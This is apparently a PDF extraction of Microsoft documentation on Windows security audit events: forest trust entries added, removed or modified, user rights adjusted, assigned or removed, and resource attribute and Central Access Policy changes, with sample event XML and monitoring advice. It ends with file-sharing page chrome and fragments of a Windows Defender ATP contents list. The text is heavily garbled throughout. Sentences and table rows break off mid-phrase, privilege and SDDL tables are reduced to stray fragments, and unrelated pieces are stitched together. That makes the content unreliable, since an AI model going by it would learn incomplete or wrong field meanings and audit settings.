4865(S): A trusted forest information entry was
added.
Applies to
Windows 10
Windows Server 2016
Change
Event Description:
This event generates when new trusted forest
information entry was added.
controllers.

Event XML:
- <System>
<Level>0</Level>
<Task>13569</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="ForestRoot">Fabrikam.local</Data>
<Data Name="ForestRootSid">S-1-5-21-2703072690-1374247579-2643703677</Data>
<Data Name="OperationId">0x648620</Data>
<Data Name="EntryType">2</Data>
<Data Name="Flags">0</Data>
<Data Name="TopLevelName">-</Data>
<Data Name="DnsName">Fabrikam.local</Data>
<Data Name="NetbiosName">FABRIKAM</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that requested the “add a trusted forest information entry” operation.
Account Name [Type = UnicodeString]: the name of the account that requested the “add a trusted forest
information entry” operation.
the following:
Trust Information:
Forest Root [Type = UnicodeString]: the name of the Active Directory forest for which trusted forest
information entry was added.
Forest Root SID [Type = SID ]: the SID of the Active Directory forest for which trusted forest information entry
was added. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be
Operation ID [Type = HexInt64]: unique hexadecimal identifier of the operation. You can correlate this event
with other events (4866(S ): A trusted forest information entry was removed, 4867(S ): A trusted forest
information entry was modified.) using this field.
Entry Type [Type = UInt32]: the type of added entry:
VALUE TYPE NAME DESCRIPTION
0 ForestTrustTopLevelName The DNS name of the trusted forest.

The structure used for this record type
is equivalent to LSA_UNICODE_STRING
1 ForestTrustTopLevelNameEx This type commonly used for name

suffix exceptions. The structure used for
this record type is equivalent to
LSA_UNICODE_STRING.
2 ForestTrustDomainInfo This field specifies a record containing

identification and name information
Flags [Type = UInt32]: The following table specifies the possible flags.
Some flag values are reused for different forest record types. See the “Meaning” column for more
information.
VALUE TRUST TYPE MEANING
0 - No flags were set.
1 ForestTrustTopLevelNameEx The top-level name trust record is

ForestTrustTopLevelName disabled during initial creation.
ForestTrustDomainInfo The domain information trust record is

disabled by the domain administrator.

ForestTrustTopLevelName disabled by the domain administrator.

disabled due to a conflict.

ForestTrustTopLevelName disabled due to a conflict.

8 ForestTrustDomainInfo The domain information trust record is

Top Level Name [Type = UnicodeString]: the name of the new trusted forest information entry.
DNS Name [Type = UnicodeString]: DNS name of the trust partner. This parameter might not be captured
in the event, and in that case appears as “-”.
NetBIOS Name [Type = UnicodeString]: NetBIOS name of the trust partner. This parameter might not be
Domain SID [Type = SID ]: SID of the trust partner. This parameter might not be captured in the event, and
in that case appears as “NULL SID”.

For 4865(S ): A trusted forest information entry was added.
Any changes related to Active Directory forest trusts (especially creation of the new trust) must be monitored
and alerts should be triggered. If this change was not planned, investigate the reason for the change.
removed.
Applies to
Windows 10
Windows Server 2016
Change
Event Description:
This event generates when the trusted forest
information entry was removed.
controllers.

Event XML:
- <System>
<Level>0</Level>
<Task>13569</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that requested the “remove a trusted forest information entry”
operation. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be
Account Name [Type = UnicodeString]: the name of the account that requested the “remove a trusted
forest information entry” operation.
the following:
Trust Information:
information entry was removed.
was removed. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot
be resolved, you will see the source data in the event.
with other events (4865(S ): A trusted forest information entry was added, 4867(S ): A trusted forest information
entry was modified.) using this field.
Entry Type [Type = UInt32]: the type of removed entry:


LSA_UNICODE_STRING.

information.







Top Level Name [Type = UnicodeString]: the name of the removed trusted forest information entry.

For 4866(S ): A trusted forest information entry was removed.
Any changes related to Active Directory forest trusts (especially trust removal) must be monitored and alerts
modified.
Applies to
Windows 10
Windows Server 2016
Change
Event Description:
This event generates the trusted forest
information entry was modified.
controllers.
This event contains new values only, it doesn’t
contains old values and it doesn’t show you
which trust attributes were modified.

Event XML:
- <System>
<Level>0</Level>
<Task>13569</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that requested the “modify/change a trusted forest information
entry” operation. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID
Account Name [Type = UnicodeString]: the name of the account that requested the “modify/change a
trusted forest information entry” operation.
the following:
Trust Information:
information entry was modified.
was modified. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot
be resolved, you will see the source data in the event.
with other events (4865(S ): A trusted forest information entry was added, 4866(S ): A trusted forest information
entry was removed) using this field.
Entry Type [Type = UInt32]: the type of modified entry:


LSA_UNICODE_STRING.

information.







Top Level Name [Type = UnicodeString]: the name of the modified trusted forest information entry.

For 4867(S ): A trusted forest information entry was modified.
Any changes in Active Directory forest trust settings must be monitored and alerts should be triggered. If this
change was not planned, investigate the reason for the change.
Applies to
Windows 10
Windows Server 2016
Audit Authorization Policy Change allows you to audit assignment and removal of user rights in user right
policies, changes in security token object permission, resource attributes changes and Central Access Policy
changes for file system objects.
STRONGER STRONGER
Domain IF No IF No IF – With Success

Controller auditing for this
subcategory, you
can get
information
related to
changes in user
rights policies, or
changes of
resource
attributes or
Central Access
Policy applied to
file system
objects.
However, if you
are using an
application or
system service
that makes
changes to
system privileges
through the
AdjustPrivilegesT
oken API, we do
not recommend
Success auditing
because of the
high volume of
event “4703(S): A
user right was
adjusted” that
may be
generated. As of
Windows 10,
event 4703 is
generated by
applications or
services that
dynamically
adjust token
privileges. An
example of such
an application is
an application is
STRONGER STRONGER System Center
COMPUTER TYPE GENERAL SUCCESS GENERAL FAILURE SUCCESS FAILURE Configuration
COMMENTS
Manager, which
makes WMI
queries at
recurring
intervals and
quickly generates
a large number
of 4703 events
(with the WMI
activity listed as
coming from
svchost.exe).
If one of your
applications or
services is
generating a
large number of
4703 events, you
might find that
your event-
management
software has
filtering logic that
can automatically
discard the
recurring events,
which would
make it easier to
work with
Success auditing
for this category.
This subcategory
doesn’t have
Failure events, so
there is no
recommendation
to enable Failure
auditing for this
subcategory.
Member Server IF No IF No IF – With Success

auditing for this
subcategory, you
can get
information
related to
changes in user
rights policies, or
changes of
resource
attributes or
Central Access
Policy applied to
file system
objects.
However, if you
are using an
application or
system service
that makes
changes to
system privileges
through the
through the
STRONGER STRONGER AdjustPrivilegesT
COMPUTER TYPE GENERAL SUCCESS GENERAL FAILURE SUCCESS FAILURE oken
COMMENTSAPI, we do
not recommend
Success auditing
because of the
high volume of
event “4703(S): A
user right was
adjusted” that
may be
generated. As of
Windows 10,
event 4703 is
generated by
applications or
services that
dynamically
adjust token
privileges. An
example of such
an application is
System Center
Configuration
Manager, which
makes WMI
queries at
recurring
intervals and
quickly generates
a large number
of 4703 events
(with the WMI
activity listed as
coming from
svchost.exe).
If one of your
applications or
services is
generating a
large number of
4703 events, you
might find that
your event-
management
software has
filtering logic that
can automatically
discard the
recurring events,
which would
make it easier to
work with
Success auditing
for this category.
This subcategory
doesn’t have
Failure events, so
there is no
recommendation
to enable Failure
auditing for this
subcategory.
Workstation IF No IF No IF – With Success

auditing for this
auditing for this
STRONGER STRONGER subcategory, you
COMPUTER TYPE GENERAL SUCCESS GENERAL FAILURE SUCCESS FAILURE can get
COMMENTS
information
related to
changes in user
rights policies, or
changes of
resource
attributes or
Central Access
Policy applied to
file system
objects.
However, if you
are using an
application or
system service
that makes
changes to
system privileges
through the
AdjustPrivilegesT
oken API, we do
not recommend
Success auditing
because of the
high volume of
event “4703(S): A
user right was
adjusted” that
may be
generated. As of
Windows 10,
event 4703 is
generated by
applications or
services that
dynamically
adjust token
privileges. An
example of such
an application is
System Center
Configuration
Manager, which
makes WMI
queries at
recurring
intervals and
quickly generates
a large number
of 4703 events
(with the WMI
activity listed as
coming from
svchost.exe).
If one of your
applications or
services is
generating a
large number of
4703 events, you
might find that
your event-
management
software has
STRONGER STRONGER
COMPUTER TYPE GENERAL SUCCESS GENERAL FAILURE SUCCESS FAILURE filtering
COMMENTS logic that
can automatically
discard the
recurring events,
which would
make it easier to
work with
Success auditing
for this category.
This subcategory
doesn’t have
Failure events, so
there is no
recommendation
to enable Failure
auditing for this
subcategory.
Events List:
4703(S ): A user right was adjusted.
4704(S ): A user right was assigned.
4705(S ): A user right was removed.
4911(S ): Resource attributes of the object were changed.
4913(S ): Central Access Policy on the object was changed.
Event volume: Medium to High.
4703(S): A user right was adjusted.
Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Authorization Policy Change
Event Description:
This event generates when token privileges were
enabled or disabled for a specific account’s token.
As of Windows 10, event 4703 is also logged by
applications or services that dynamically adjust
token privileges. An example of such an application
is System Center Configuration Manager, which
makes WMI queries at recurring intervals and
quickly generates a large number of 4703 events
(with the WMI activity listed as coming from
svchost.exe). If you are using an application or
system service that makes changes to system
privileges through the AdjustPrivilegesToken API,
you might need to disable Success auditing for this
subcategory (Audit Authorization Policy Change),
or work with a very high volume of event 4703.

Token privileges provide the ability to take certain

system-level actions that you only need to do at particular moments. For example, anybody can restart a
computer, but the operating system doesn’t enable that privilege by default. Instead, the privilege is enabled when
you click Shutdown. You can check the current state of the user’s token privileges using the whoami /priv
command:
Event XML:
- <System>
<Level>0</Level>
<Task>13570</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="TargetUserName">WIN-GG82ULGC9GO$</Data>
<Data Name="TargetLogonId">0x3e7</Data>
<Data Name="EnabledPrivilegeList">SeAssignPrimaryTokenPrivilege SeIncreaseQuotaPrivilege SeSecurityPrivilege
SeTakeOwnershipPrivilege SeLoadDriverPrivilege SeSystemtimePrivilege SeBackupPrivilege SeRestorePrivilege
SeShutdownPrivilege SeSystemEnvironmentPrivilege SeUndockPrivilege SeManageVolumePrivilege</Data>
<Data Name="DisabledPrivilegeList">-</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that requested the “enable” or “disable” operation for Target
Account privileges. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID
Account Name [Type = UnicodeString]: the name of the account that requested the “enable” or “disable”
operation for Target Account privileges.
the following:
Target Account:
Security ID [Type = SID ]: SID of account for which privileges were enabled or disabled. Event Viewer
Account Name [Type = UnicodeString]: the name of the account for which privileges were enabled or
disabled.
the following:
Process ID [Type = Pointer]: hexadecimal Process ID of the process that enabled or disabled token
privileges. Process ID (PID ) is a number used by the operating system to uniquely identify an active
column):
Enabled Privileges [Type = UnicodeString]: the list of enabled user rights. This event generates only for user
rights, not logon rights. Here is the list of possible user rights:

of a process.

operations.
is held:
READ_CONTROL
FILE_GENERIC_READ
FILE_TRAVERSE

the user may not have permissions on
the traversed directory. This privilege
does not allow the user to list the
contents of a directory, only to traverse
directories.



creation APIs.

another account.
components.

a process.
interface.
users.
driver.

memory.
system performance by decreasing the
amount of available random access
memory (RAM).
computer account.
controllers.

defragmentation.

system processes.

SeRemoteShutdownPrivilege Force shutdown from a remote system Required to shut down a system using
a network request.

held:
WRITE_DAC
WRITE_OWNER
FILE_GENERIC_WRITE
FILE_ADD_FILE
DELETE
an object.

security event log.
synchronization.

information.

processes.
clock.



a terminal device.
Disabled Privileges [Type = UnicodeString]: the list of disabled user rights. See possible values in the table
above.

For 4703(S ): A user right was adjusted.
As of Windows 10, event 4703 is generated by applications or services that dynamically adjust token privileges.
An example of such an application is System Center Configuration Manager, which makes WMI queries at
recurring intervals and quickly generates a large number of 4703 events (with the WMI activity listed as coming
from svchost.exe). If you are using an application or system service that makes changes to system privileges
through the AdjustPrivilegesToken API, you might need to disable Success auditing for this subcategory, Audit
Authorization Policy Change, or work with a very high volume of event 4703.
Otherwise, see the recommendations in the following table.
High-value accounts: You might have high-value domain or Monitor this event with the “Subject\Security ID” that
Non-active accounts: You might have non-active, disabled, Monitor this event with the “Subject\Security ID” or
or guest accounts, or other accounts that should never be “Target Account\Security ID” that correspond to the
used. accounts that should never be used.
corresponding to particular events. whitelist. Also check the “Target Account\Security ID” and
“Enabled Privileges” to see what was enabled.
events).
people (accounts) should perform only limited actions, or no concerned about.
actions at all. Also check “Target Account\Security ID” to see whether
the change in privileges should be made on that computer for
that account.
User rights that should be restricted or monitored: You Monitor this event and compare the “Enabled Privileges” to
might have a list of user rights that you want to restrict or your list of user rights. Trigger an alert for user rights that
monitor. should not be enabled, especially on high-value servers or
other computers.
For example, you might have SeDebugPrivilege on a list of
user rights to be restricted.
4704(S): A user right was assigned.
Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Authorization Policy
Change
Event Description:
This event generates every time local user right
policy is changed and user right was assigned
to an account.
You will see unique event for every user.

Event XML:
- <System>
<Level>0</Level>
<Task>13570</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="PrivilegeList">SeAuditPrivilege SeIncreaseWorkingSetPrivilege</Data>
</EventData>
</Event>
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that made a change to local user right policy. Event Viewer
Account Name [Type = UnicodeString]: the name of the account that made a change to local user right
policy.
the following:
Target Account:
Account Name [Type = SID ]: the SID of security principal for which user rights were assigned. Event Viewer
**New Right: **
User Right [Type = UnicodeString]: the list of assigned user rights. This event generates only for user rights,
not logon rights. Here is the list of possible user rights:


a process.

operations.
held:
READ_CONTROL
FILE_GENERIC_READ
FILE_TRAVERSE





creation APIs.

account.
components.

a process.
interface.
to a process.
users.
driver.

memory.
computer account.
controllers.

defragmentation.

system processes.

network request.

held:
WRITE_DAC
WRITE_OWNER
FILE_GENERIC_WRITE
FILE_ADD_FILE
DELETE
an object.

security event log.
synchronization.
information.

processes.
clock.



a terminal device.

For 4704(S ): A user right was assigned.
Non-active accounts: You might have non-active, disabled, Monitor this event with the “Subject\Security ID” or “Target
or guest accounts, or other accounts that should never be Account\ Account Name” that correspond to the accounts
used. that should never be used.
corresponding to particular events. whitelist. Also check the “Target Account\Account Name”
and “New Right” to see what was enabled.
events).
people (accounts) should perform only limited actions, or no concerned about.
actions at all. Also check “Target Account\ Account Name” to see
whether the change in rights should be made on that
computer for that account.
User rights that should be restricted or monitored: You Monitor this event and compare the “New Right\User Right”
might have a list of user rights that you want to restrict or to your list of user rights, to see whether the right should be
monitor. assigned to “Target Account\Account Name.” Trigger an
alert for user rights that should not be enabled, especially on
high-value servers or other computers.
For example, your list of restricted rights might say that only
administrative accounts should have SeAuditPrivilege. As
another example, your list might say that no accounts should
have SeTcbPrivilege or SeDebugPrivilege.
4705(S): A user right was removed.
Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Authorization Policy
Change
Event Description:
This event generates every time local user right
policy is changed and user right was removed
from an account.
You will see unique event for every user.

Event XML:
- <System>
<Level>0</Level>
<Task>13570</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="PrivilegeList">SeTimeZonePrivilege</Data>
</EventData>
</Event>
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that made a change to local user right policy. Event Viewer
Account Name [Type = UnicodeString]: the name of the account that made a change to local user right
policy.
the following:
Target Account:
Account Name [Type = SID ]: the SID of security principal for which user rights were removed. Event Viewer
**Removed Right: **
User Right [Type = UnicodeString]: the list of removed user rights. This event generates only for user rights,
not logon rights. Here is the list of possible user rights:


a process.

operations.
held:
READ_CONTROL
FILE_GENERIC_READ
FILE_TRAVERSE





creation APIs.

account.
components.

a process.
interface.
to a process.
users.
driver.

memory.
computer account.
controllers.

defragmentation.

system processes.

network request.

held:
WRITE_DAC
WRITE_OWNER
FILE_GENERIC_WRITE
FILE_ADD_FILE
DELETE
an object.

security event log.
synchronization.
information.

processes.
clock.



a terminal device.

For 4705(S ): A user right was removed.
Non-active accounts: You might have non-active, disabled, Monitor this event with the “Subject\Security ID” or “Target
or guest accounts, or other accounts that should never be Account\Account Name” that correspond to the accounts
used. that should never be used.
If you have specific user rights policies, for example, a whitelist
of accounts that can perform certain actions, monitor this
event to confirm that it was appropriate that the “Removed
Right” was removed from “Target Account\Account Name.”
for example, local or domain account, machine or user “Target Account\Account Name” to see whether the
For example, if some accounts have critical user rights which
should never be removed, monitor this event for the “Target
Account\Account Name” and the appropriate rights.
As another example, if non-administrative accounts should
never be granted certain user rights (for example,
SeAuditPrivilege), you might monitor this event, because a
right can be removed only after it was previously granted.
events).
people (accounts) should perform only limited actions, or no concerned about. Also be sure to check “Target
actions at all. Account\Account Name” to see whether user rights should
be removed from that account (or whether that account
should have any rights on that computer).
“Removed Right” should be removed from “Target
Account\Account Name” in each case.
User rights that should be restricted: You might have a list Monitor this event and compare the “Removed Right” to
of user rights that you want to monitor. your list of restricted rights.
Monitor this event to discover the removal of a right that
should never have been granted (for example, SeTcbPrivilege),
so that you can investigate further.
Applies to
Windows 10
Windows Server 2016
Event Description:
This event generates when the permissions
for an object are changed. The object could
be a file system, registry, or security token
object.
Ownership” are set in the object’s SACL. For
a registry key, it generates only if “Write
DAC" and/or "Write Owner” are set in the
object’s SACL.

event.
Event XML:
- <System>
<Level>0</Level>
<Task>13570</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Object:
Process:
changed. Process ID (PID ) is a number used by the operating system to uniquely identify an active
column):
Permissions Change:
Example:
in the table below:

Windows 2000


operators

administrators

controllers
G: = Primary Group.
D: = DACL Entries.
S: = SACL Entries.
entry_type:
“D” - DACL
“S” - SACL
inheritance_flags:
ace_type:
"D" - ACCESS DENIED
"AU" - SYSTEM AUDIT
"A" - SYSTEM ALARM
ace_flags:
ACE.
rights: A hexadecimal string which denotes the access mask or reserved value, for example: FA (File All
Access), FX (File Execute), FW (File Write), etc.

rights

"KX" KEY EXECUTE
object_guid: N/A
account_sid: SID of specific security principal, or reserved value, for example: AN (Anonymous), WD
(Everyone), SY (LOCAL_SYSTEM ), etc. See the table above for more details.

For token objects, this is typically an informational event, and at the same time it is difficult to identify which
token's permission were changed. For token objects, there are no monitoring recommendations for this event in
this document.
events.
4911(S): Resource attributes of the object were
changed.
Applies to
Windows 10
Windows Server 2016
Subcategory: Audit
Authorization Policy Change
Event Description:
This event generates when
resource attributes of the file
system object were changed.
Resource attributes for file or
folder can be changed, for
example, using Windows File
Explorer (object’s Properties-
>Classification tab).
Note For recommendations,

see Security Monitoring
Recommendations for this
event.
Event XML:
- <System>
<Level>0</Level>
<Task>13570</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="ObjectName">C:\\Audit Files\\HBI Data.txt</Data>
<Data Name="HandleId">0x49c</Data>
<Data Name="NewSd">S:ARAI(RA;ID;;;;WD;("Impact\_MS",TI,0x10020,3000))</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that changed the resource attributes of the file system object. Event
Account Name [Type = UnicodeString]: the name of the account that changed the resource attributes of
the file system object.
the following:
Object:
Object Name [Type = UnicodeString]: full path and/or name of the object for which resource attributes were
changed.
this event with other events that might contain the same Handle ID, for example, “4663(S ): An attempt was
made to access an object.” This parameter might not be captured in the event, and in that case appears as “0x0”.
Process ID [Type = Pointer]: hexadecimal Process ID of the process through which the resource attributes
of the file system object were changed. Process ID (PID ) is a number used by the operating system to
uniquely identify an active process. To see the PID for a specific process you can, for example, use Task
Manager (Details tab, PID column):
Resource Attributes:
Original Security Descriptor [Type = UnicodeString]: the Security Descriptor Definition Language
(SDDL ) value for the old resource attributes.
For example: S:AI(RA;ID;;;;WD;("Impact_MS",TI,0x10020,3000))
If no resource attributes were set to the object, then SDDL will not contain any attributes, for example “S:AI”.
New Security Descriptor [Type = UnicodeString]: the Security Descriptor Definition Language (SDDL ) value
for the new resource attributes. See more information in Resource Attributes\Original Security Descriptor
field section for this event.
Example:
in the table below:

Windows 2000

operators

administrators


controllers
G: = Primary Group.
D: = DACL Entries.
S: = SACL Entries.
entry_type:
“D” - DACL
“S” - SACL
inheritance_flags:
ace_type:
"D" - ACCESS DENIED
"AU" - SYSTEM AUDIT
"A" - SYSTEM ALARM
ace_flags:
ACE.

rights
"KX" KEY EXECUTE
object_guid: N/A

For 4911(S ): Resource attributes of the object were changed.
If you need to monitor events related to specific Windows object types (“Object Type”), for example File or
Key, monitor this event for the corresponding “Object Type.”
If you need to monitor all changes to specific files or folders (in this case, changes to resource attributes),
monitor for the “Object Name” that corresponds to the file or folder.
You can track changes when, for example, a file was marked as High Impact, or was changed from High
Impact to Medium Impact, or a resource was marked as a data type for a specific department and so on.
This event can help track changes and resource attribute assignments, which you can see in “Original
Security Descriptor” and “New Security Descriptor” fields.
4913(S): Central Access Policy on the object was
changed.
Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Authorization Policy Change

Event Description:
This event generates when a Central Access Policy on a file system object is changed.
This event always generates, regardless of the object’s SACL settings.
Event XML:
- <System>
<Level>0</Level>
<Task>13570</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="ObjectName">C:\\Audit Files\\HBI Data.txt</Data>
<Data Name="HandleId">0x3d4</Data>
<Data Name="NewSd">S:ARAI(SP;ID;;;;S-1-17-1442530252-1178042555-1247349694-2318402534)</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that changed the Central Access Policy on the object. Event Viewer
principal). Each account has a unique SID

Threat Protection PDF

Caricato da

Informazioni sul documento

Titolo originale

Copyright

Formati disponibili

Condividi questo documento

Condividi o incorpora il documento

Opzioni di condivisione

Hai trovato utile questo documento?

Questo contenuto è inappropriato?

Copyright:

Formati disponibili

Threat Protection PDF

Caricato da

Copyright:

Formati disponibili

Contents

Windows Defender ATP

Threat & Attack Next Endpoint Automated Microsoft

Management and APIs

Microsoft Threat Protection

Threat & Vulnerability Management

Want to experience Windows Defender ATP? Sign up for a free trial.

Windows Defender ATP

Threat & Attack Next Endpoint Automated Microsoft

Management and APIs

Microsoft Threat Protection

Threat & Vulnerability Management

Overview Understand the concepts behind the capabilities in Windows

Portal overview Learn to navigate your way around Windows Defender

Exploit protection Applies exploit mitigation techniques to apps your

Network firewall Host-based, two-way network traffic filtering that blocks

What is Application Guard and how does it work?

What types of devices should use Application Guard?

Frequently Asked Questions

Q: Can I enable Application Guard on machines equipped with

A: We recommend 8GB RAM for optimal performance but you

Q: Can employees download documents from the Application

A: In Windows 10 Enterprise edition 1803, users will be able to

In Windows 10 Enterprise edition 1709 or Windows 10

Q: Why don't employees see their Favorites in the Application

A: To help keep the Application Guard Edge session secure and

Q: Why aren’t employees able to see their Extensions in the

A: Currently, the Application Guard Edge session doesn't support

Q: How do I configure WDAG to work with my network proxy

A: WDAG requires proxies to have a symbolic name, not just an

Q: I enabled the hardware acceleration policy on my Windows 10

A: This feature is currently experimental-only and is not

A: This account is part of Application Guard beginning with

64-bit CPU A 64-bit computer with minimum 4 cores (logical processors)

One of the following virtualization extensions for VBS:

Hardware memory Microsoft requires a minimum of 8GB RAM

Hard disk 5 GB free space, solid state disk (SSD) recommended

Operating system Windows 10 Enterprise edition, version 1709 or higher

Browser Microsoft Edge and Internet Explorer

Management system Microsoft Intune

System Center Configuration Manager

Your current company-wide 3rd party mobile device

Maintaining the integrity of the system as it starts

Validating platform integrity after Windows is running (run time)

WDAC System Requirements

New and changed functionality

Review exploit protection events in Windows Event Viewer

PROVIDER/SOURCE EVENT ID DESCRIPTION

Security-Mitigations 1 ACG audit

Security-Mitigations 2 ACG enforce

Security-Mitigations 3 Do not allow child processes audit

Security-Mitigations 4 Do not allow child processes block

Security-Mitigations 5 Block low integrity images audit

Security-Mitigations 6 Block low integrity images block

Security-Mitigations 7 Block remote images audit

Security-Mitigations 8 Block remote images block

Security-Mitigations 9 Disable win32k system calls audit

Security-Mitigations 10 Disable win32k system calls block

Security-Mitigations 11 Code integrity guard audit

Security-Mitigations 12 Code integrity guard block

Security-Mitigations 13 EAF audit

Security-Mitigations 14 EAF enforce

Security-Mitigations 15 EAF+ audit